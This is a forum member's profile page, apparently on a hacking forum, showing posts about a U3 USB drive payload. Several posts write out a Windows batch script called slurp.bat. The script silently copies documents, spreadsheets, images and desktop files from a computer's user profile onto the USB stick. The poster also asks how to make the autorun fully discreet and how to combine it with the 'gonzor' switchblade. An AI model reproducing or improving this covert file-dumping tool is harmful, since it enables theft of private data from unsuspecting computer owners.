Jump to content

premiumunleaded

Active Members
  • Posts

    6
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

premiumunleaded's Achievements

Newbie

Newbie (1/14)

  1. well since i didnt use theprod key dump, i just linked it to slurp. bat, then remove /nosavereg and put a %1, and use this to make slurp, :: My Documents files mkdir %1documents%computername%MyDocuments xcopy "C:Documents and Settings%username%My Documents*.*" %1documents%computername%MyDocuments /s/c/q/r/h xcopy "h:*.*" %1documents%computername%MyDocuments /s/c/q/r/h :: Desktop files mkdir %1documents%computername%Desktop xcopy "C:Documents and Settings%username%Desktop*.*" %1documents%computername%Desktop /s/c/q/r/h the H: is just a specific hard drive for me.
  2. wut that look like (run=launchu3.exe ??), and that wouldn't make it silent, would i add like a -hide after it?
  3. I need help once again. I have looked in the forums, but no help there. How do i make the u3 100% discrete. when i plug it in the first time it only finds the u3 (cd) drive, until i either click the launchpad in the U3 part or reboot. Can someone help with this, on how to make detect it the first time i plug in, and how to make 100% discrete. Much appreciated.
  4. i just made a dumper that works with gonzors and will dump the whole drive or a specific file, that will dump to your usb no matter if its h: or z:.
  5. so i have gonzor works great; thank you. the problem i have is how do i integrate a homemade file dumper with this code. :: My Documents files mkdir documents%computername%MyDocuments xcopy "C:Documents and Settings%username%My Documents*.doc" l:documents%computername%MyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.txt" l:documents%computername%MyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.xls" l:documents%computername%MyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.csv" l:documents%computername%MyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.jpg" l:documents%computername%MyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.gif" documents%computername%MyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.htm" documents%computername%MyDocuments /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.ppt" documents%computername%MyDocuments /s/c/q/r/h xcopy "h:*.doc" documents%computername%MyDocuments /s/c/q/r/h :: Desktop files mkdir documents%computername%Desktop xcopy "C:Documents and Settings%username%Desktop*.doc" documents%computername%Desktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.txt" documents%computername%Desktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.xls" documents%computername%Desktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.csv" documents%computername%Desktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.jpg" documents%computername%Desktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.gif" documents%computername%Desktop /s/c/q/r/h xcopy "C:Documents and Settings%username%Desktop*.htm" documents%computername%Desktop /s/c/q/r/h xcopy "C:Documents and Settings%username%My Documents*.ppt" documents%computername%MyDocuments /s/c/q/r/h i nicknamed it slurp. bat i no other people have asked this question, and i could only find out how to make the file dumper, but not how to integrate it into my new sanDisk Cruzer (u3) if you could help it would be much appreciated
×
×
  • Create New...